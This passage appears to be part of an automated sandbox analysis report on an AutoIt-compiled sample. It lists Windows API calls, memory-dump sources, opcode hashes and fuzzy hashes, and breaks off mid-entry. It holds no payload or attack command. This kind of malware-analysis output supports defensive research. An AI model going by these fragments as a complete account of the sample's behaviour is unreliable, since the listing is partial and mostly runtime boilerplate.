                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7d5ac01fdf58097fb49c1fcfdf3433e139ccf7f860fa0201f83b756215413b24
                                                                                                                                                                                                                                                                                    • Instruction ID: 511361d52c0d1142654dd1ad5f32ca813c07951acdb6ba76c44a6cd23b15f449
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d5ac01fdf58097fb49c1fcfdf3433e139ccf7f860fa0201f83b756215413b24
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9391C671E002269EDB208F6CEC95AEE7BF5EF29710F140AA9E819E7140E735DD81C760
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                    • Opcode ID: 539be77672019f44610d856b7c0dc500381cc9d74c936819ee899b4d189c6ba3
                                                                                                                                                                                                                                                                                    • Instruction ID: e84c530569920d8dc92836ae8a31095efb332dfde2a984cc5b7a25c15c61af29
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 539be77672019f44610d856b7c0dc500381cc9d74c936819ee899b4d189c6ba3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75917A71A00619ABDF20CFA5CC88FAEBBF8EF45714F108599F519AB280D7749945CFA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B51C1B
                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51C43
                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00B51C67
                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51C97
                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51D1E
                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51D83
                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51DEF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 99b186e59421953abd2594a122ebbf4c8be0f483b917df147ad4d861442e77c9
                                                                                                                                                                                                                                                                                    • Instruction ID: ea613b96a1b59f9ba6e8ff5489aadefcb328941138dc411cc3f1f6638196968f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99b186e59421953abd2594a122ebbf4c8be0f483b917df147ad4d861442e77c9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D591EF75A00219AFDB00DF9CC885BBEB7F4FF04712F1488E9E940AB291DB75A949CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B643C8
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00B644D7
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B644E7
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B6467C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5169E: VariantInit.OLEAUT32(00000000), ref: 00B516DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5169E: VariantCopy.OLEAUT32(?,?), ref: 00B516E7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5169E: VariantClear.OLEAUT32(?), ref: 00B516F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                    • Opcode ID: 3b1457475a88f1f1ca21f352ef5709ccb8fef99945ea6c7698fb1029702e1875
                                                                                                                                                                                                                                                                                    • Instruction ID: b1ef0666e449b4f6e6da9739898a57604a15cc2adff90ad747f5abfe89395f59
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b1457475a88f1f1ca21f352ef5709ccb8fef99945ea6c7698fb1029702e1875
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6919870A087419FC710EF28C58092AB7E5FF89714F1488ADF88A9B351DB35ED06CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B408FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?,?,00B40C4E), ref: 00B4091B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B408FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40936
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B408FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40944
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B408FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?), ref: 00B40954
                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B656AE
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B657B6
                                                                                                                                                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B6582C
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00B65837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                    • Opcode ID: ebcd6f2c16e301dc028ca2fe399c001514f9c6cb662a813d8df4d2ca682b1225
                                                                                                                                                                                                                                                                                    • Instruction ID: e57f5159ed6be2a3c5eed657663a9acecbdbd4b2230e17ade484ddddff595329
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebcd6f2c16e301dc028ca2fe399c001514f9c6cb662a813d8df4d2ca682b1225
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA910671D10259EFDF21DFA4DC80AEEBBB8BF08304F1045A9E915A7251EB749A54CF60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00B72C1F
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00B72C51
                                                                                                                                                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B72C79
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B72CAF
                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00B72CE9
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00B72CF7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B443AD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: GetCurrentThreadId.KERNEL32 ref: 00B443B4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B42F00), ref: 00B443BB
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B72D7F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4F292: Sleep.KERNEL32 ref: 00B4F30A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6ee2087a447c6c085ef2245258f3712d8d6d07f17d994ba30c6110ee5e8d804d
                                                                                                                                                                                                                                                                                    • Instruction ID: f2932d27845e64fbf841e95876e83991dd67c33d9920ef692cc78a9a5c40079e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee2087a447c6c085ef2245258f3712d8d6d07f17d994ba30c6110ee5e8d804d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59716375A00215AFCB15DF65C885AAEB7F5EF48310F14C4A9E82AEB351DB34EE41CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00B78992
                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00B7899E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B78A79
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00B78AAC
                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00B78AE4
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00B78B06
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B78B1E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 03536d94709aedacc47461f0e996c6e6b3c07aa994d6ef88a392b346e07d77da
                                                                                                                                                                                                                                                                                    • Instruction ID: ec779779272a59fdf0564baafa750e862401882be4c5a3a271a52bec54d1d57c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03536d94709aedacc47461f0e996c6e6b3c07aa994d6ef88a392b346e07d77da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF71BF74684204AFDB219F54C888FBABBF5FF09340F14949AE96DA7361CB31AD81DB11
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00B4B8C0
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4B8D5
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B4B936
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B4B964
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B4B983
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B4B9C4
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B4B9E7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e54abfd885b7c987d73abbbdaf23f81643026115aecafd095a1a82feeee2cb4e
                                                                                                                                                                                                                                                                                    • Instruction ID: 888837ebc92b1cdabe12b49967c06efbfbbfff860587d3a47f16cef64bdefea3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e54abfd885b7c987d73abbbdaf23f81643026115aecafd095a1a82feeee2cb4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2951CFA06087D53EFB3642388845FBA7EE9DB06704F0884C9E2D9568D2C7D8EED4E751
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 00B4B6E0
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4B6F5
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B4B756
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B4B782
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B4B79F
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B4B7DE
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B4B7FF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8fa769d9ae8fd1e6f35de9b06fece3cc0a66a091dcd6de076765e9aa9bd69a72
                                                                                                                                                                                                                                                                                    • Instruction ID: cbc99188a8478670df0774d06d485729a143d6e1a118be332896c639d7659e8e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fa769d9ae8fd1e6f35de9b06fece3cc0a66a091dcd6de076765e9aa9bd69a72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB51DFA09086D53EFB3683248C55F7ABFE9DB46304F0884C9E2D94A8D2D394EE94F751
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B15F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B157E3
                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00B1585E
                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00B15879
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B1589F
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00B15F16,00000000,?,?,?,?,?,?,?,?,?,00B15F16,?), ref: 00B158BE
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00B15F16,00000000,?,?,?,?,?,?,?,?,?,00B15F16,?), ref: 00B158F7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 59b7a51a3b127f86cb7885248f8a96b739a47fb270d85295e45604c284e50cfd
                                                                                                                                                                                                                                                                                    • Instruction ID: 0c3753b41a35d3d465d4ff1a5ed4d0f32bbaf41cc1153ee2977e1c6e4ec14da0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59b7a51a3b127f86cb7885248f8a96b739a47fb270d85295e45604c284e50cfd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C51D8B1A00649DFCB20CFA8D981BEEBBF8EF48310F54415AE555E7291D730EA81CB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B030BB
                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B030C3
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B03151
                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00B0317C
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B031D1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                    • Opcode ID: 5ba24546b00bdcbcb36a5cc4aa735a12d9e6f4f7b57a77dbf05e57991a9b60b4
                                                                                                                                                                                                                                                                                    • Instruction ID: 4303221de816611bd79cd51ec9d93b48edd16b42820de6752b1404a580353b4e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ba24546b00bdcbcb36a5cc4aa735a12d9e6f4f7b57a77dbf05e57991a9b60b4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6441A134A002089BCF10DF68C889A9EBFF9EF49B14F1481D5E815AB3E2D7319B05CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B63AD7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63AAB: _wcslen.LIBCMT ref: 00B63AF8
